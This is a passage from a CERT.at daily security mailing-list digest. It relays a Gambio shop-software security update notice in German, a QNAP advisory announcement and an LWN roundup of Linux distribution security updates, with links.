Wir haben soeben ein neues Security Update Paket veröffentlicht, dessen Installation wir allen Shopbetreibern dringend empfehlen. Wichtig: Nutzer der Gambio Cloud müssen nichts unternehmen, alle Shops wurden bereits vollständig von uns abgesichert! [..] Bitte versteht, dass wir keine Details beschreiben werden, die Angreifern als Blaupause für einen Angriff dienen könnten.
---------------------------------------------
https://www.gambio.de/forum/threads/wichtiges-security-update-2025-12-v1-0-…
∗∗∗ QNAP Security Advisories 3. Jan ∗∗∗
---------------------------------------------
QNAP has released 7 new security advisories.
---------------------------------------------
https://www.qnap.com/en-us/security-advisories
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (smb4k), Fedora (direwolf, gh, usd, and webkitgtk), Slackware (libpcap and seamonkey), and SUSE (kepler).
---------------------------------------------
https://lwn.net/Articles/1052600/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/